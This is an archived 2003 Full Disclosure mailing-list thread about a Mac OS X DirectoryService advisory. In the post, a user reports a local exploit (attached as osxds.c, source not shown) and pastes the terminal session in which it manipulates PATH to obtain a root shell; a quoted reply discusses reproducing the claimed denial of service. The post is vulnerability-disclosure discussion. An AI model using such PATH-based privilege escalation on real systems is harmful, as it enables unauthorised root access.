Full Disclosure mailing list archives
Re: OS X DirectoryService DoS {@stake adv:
From: Neeko Oni <neeko () haackey com>
Date: Thu, 17 Apr 2003 22:15:35 -0700 (PDT)
Hoping to encourage people to figure out what @stake was talking about in regards to the OS X DirectoryService DoS, I've attached a local exploit for DirectoryService _once is has been crashed/killed_. [sera:~] loser% gcc osxds.c -o touch [sera:~] loser% ./touch Original path: /bin:/sbin:/usr/bin:/usr/sbin New path: . Executing DirectoryService with false PATH... Forked DirectoryService, pausing before shell exec... sh: rm: command not found Cross your fingers. Path restored: /bin:/sbin:/usr/bin:/usr/sbin euid is root. root:~# id uid=0(root) gid=20(staff) groups=20(staff) root:~#
Neeko Oni wrote:Ok, the PATH problem is self-explanatory (and has been exploited oncethe DirectoryService process has crashed) but I've had some difficultyreproducing the DoS attack claim. I've got a 10.2.4 machine sitting right next to me, I believe it's a stock install, but DirectoryService doesn't bind 625. DirectoryService doesn't bind any ports and furthermore nothing binds 625 at all. Has anyone reproduced the DoS in that advisory?I also read the advisory and of the two MacOS machines that I am able to access (only one locally) I can confirm that on the machine that I don't have local access there was a daemon running on port 625 and as the advisory states I was able to reproduce the DoS attack. I'm not sure exactly which version of MacOS X that machine was running but the daemon did crash and and refuse connection. On the machine that I know for a fact is 10.2.4 and have local access to, DirectoryService was setuid root and was running but there was no port 625 open. I haven't port scanned the machine to check other ports yet so i'm not ruling out the possibility its running on a different port just yet. Has anyone else looked into this matter... ? -subversive -- ______________________________________________ http://www.linuxmail.org/ Now with e-mail forwarding for only US$5.95/yr Powered by Outblaze
Attachment:
osxds.c
Description: C program text
Current thread:
- Re: OS X DirectoryService DoS {@stake adv: a041003-1} subversive (Apr 17)
- Re: OS X DirectoryService DoS {@stake adv: Neeko Oni (Apr 17)